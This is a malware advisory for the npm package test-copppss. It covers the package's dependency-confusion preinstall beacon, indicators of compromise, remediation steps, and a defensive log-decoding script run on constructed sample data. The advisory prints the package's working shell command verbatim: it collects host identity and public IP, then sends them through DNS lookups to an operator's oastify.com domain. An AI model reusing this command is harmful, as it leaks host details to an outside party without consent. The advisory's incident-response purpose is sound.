Malicious package

test-copppss (npm)

Malicious code in test-copppss (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5926

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall test-copppss

What this malware does

On npm install, the package's preinstall hook (node index.js > /dev/null 2>&1) runs a shell pipeline that collects host identifiers (hostname, pwd, whoami, the package name test-copppss, and the machine's public IP via curl https://ifconfig.me), hex-encodes the concatenation with xxd -p, and exfiltrates it as DNS subdomain lookups to *.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com (a Burp Collaborator OAST endpoint controlled by the operator).

Code at index.js:2 is:

exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done")

The package metadata (empty description, near-max version 1.999.0 to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape: the attacker is probing which internal build systems resolve test-copppss to this public name and is harvesting the host fingerprint of any environment that does.
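For incident response, the hex labels described above can be pulled out of resolver logs and decoded to show exactly what each host leaked. The JavaScript below is an added example, not code from the advisory or the package; the log layout (client=<ip> query=<name>), the client address and the sample fingerprint are constructed assumptions.

```javascript
// Added example, not the advisory's code. Domain and marker come from the advisory;
// the log layout (client=<ip> query=<name>) and all sample values are constructed.
const OAST = "iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com";
const MARKER = "test-copppss"; // literal the payload echoes before the public IP
// xxd -p prints at most 60 hex chars per line, so each beacon label is 2..60 hex chars.
const BEACON = new RegExp("\\b([0-9a-f]{2,60})\\." + OAST.replace(/\./g, "\\."), "gi");

// Group beacon labels per client in log order. A resolver may log A and AAAA
// lookups for one name, so a label equal to the previous one is dropped.
function collectBeacons(lines) {
  const byClient = new Map();
  for (const line of lines) {
    const client = (line.match(/client=(\S+)/) || [])[1] || "unknown";
    for (const m of line.matchAll(BEACON)) {
      const label = m[1].toLowerCase();
      if (label.length % 2 !== 0) continue; // odd length: not whole bytes
      const labels = byClient.get(client) || [];
      if (labels[labels.length - 1] !== label) labels.push(label);
      byClient.set(client, labels);
    }
  }
  return byClient;
}

// The payload's unquoted `echo $a` collapses newlines to spaces, giving
// "<hostname> <pwd> <whoami> test-copppss <public ip>".
function decodeFingerprint(labels) {
  const raw = Buffer.from(labels.join(""), "hex").toString("utf8").trim();
  const tok = raw.split(/\s+/);
  const i = tok.lastIndexOf(MARKER);
  if (i < 3) return { raw, complete: false }; // truncated capture or other payload
  return { raw, complete: tok.length > i + 1, hostname: tok[0],
    cwd: tok.slice(1, i - 1).join(" "), // pwd may contain spaces
    user: tok[i - 1], publicIp: tok[i + 1] || null };
}

function fingerprintsFromLog(lines) {
  const out = {};
  for (const [client, labels] of collectBeacons(lines)) out[client] = decodeFingerprint(labels);
  return out;
}

const SAMPLE_LOG = [ // constructed resolver log, not real telemetry
  "2026-01-01T10:00:00Z client=10.0.4.17 query=registry.npmjs.org type=A",
  "2026-01-01T10:00:01Z client=10.0.4.17 query=63692d3031202f6170702f6e6f64655f6d6f64756c65732f746573742d63." + OAST + " type=A",
  "2026-01-01T10:00:01Z client=10.0.4.17 query=63692d3031202f6170702f6e6f64655f6d6f64756c65732f746573742d63." + OAST + " type=AAAA",
  "2026-01-01T10:00:02Z client=10.0.4.17 query=6f707070737320726f6f7420746573742d636f7070707373203230332e30." + OAST + " type=A",
  "2026-01-01T10:00:03Z client=10.0.4.17 query=2e3131332e370a." + OAST + " type=A",
];
console.log(fingerprintsFromLog(SAMPLE_LOG));
```

Any client that appears in the result ran the preinstall hook; treat the decoded hostname, working directory and user as the scope for credential rotation.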

Malicious versions

1 flagged
1.999.0

Indicators of compromise (SHA-256)

03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe

Frequently asked questions

No. test-copppss on npm has been identified as a malicious package (version 1.999.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006832

Credits

  • Amazon Inspector · finder

test-copppss (npm) malicious package — MAL-2026-5926 | O3 Security